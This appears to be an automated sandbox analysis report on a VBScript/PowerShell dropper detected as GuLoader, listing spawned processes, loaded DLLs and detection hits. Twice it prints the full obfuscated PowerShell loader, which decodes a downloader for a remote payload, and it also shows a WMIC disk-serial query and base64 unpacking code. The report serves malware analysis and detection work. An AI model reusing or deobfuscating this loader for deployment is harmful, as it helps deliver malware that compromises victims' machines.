                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germin
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');GerminJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2411838712.0000000007685000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: indows\System.Core.pdbui source: powershell.exe, 00000006.00000002.2411838712.0000000007685000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykker", "Unsupported parameter type 00000000")
                Yara detected GuLoader
                Source: Yara matchFile source: 00000006.00000002.2420398899.000000000BB20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2420231333.0000000008AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2405265854.0000000005D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2208076716.000001A2DAD9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($stokesia)$glObal:SPkKEDe = [SysTem.texT.EnCODinG]::ASciI.GetStrINg($SENgenE)$GLOBaL:MulTibirtH=$spkKede.sUbsTrING($koNtoraSsiSTENtenS153,$FEjldIsponeRES)<#Borgerhusenes Engenderment
